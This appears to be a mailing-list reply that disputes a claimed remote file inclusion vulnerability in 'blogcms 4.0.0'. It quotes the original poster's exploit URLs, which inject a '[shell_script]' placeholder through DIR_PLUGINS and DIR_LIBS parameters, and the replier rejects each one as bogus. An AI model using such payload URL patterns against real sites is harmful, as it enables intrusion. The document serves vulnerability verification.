Re: blogcms => 4.0.0 Remote File Include
the_3dit0r@xxxxxxxxx wrote:
> # CodE :
> require_once('themes/' . $blog_theme . '/user_style.php');
Bogus...
> # Expl0itS :
> http://Site/[path]/index.php?DIR_PLUGINS=[shell_script]
Bogus, initialized in config file included
> http://Site/[path]/install.php?DIR_LIBS=[shell_script]
Bogus, initialized before being used
> http://Site/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]
Classes and functions, that for what I see cannot be called like that.
Stefano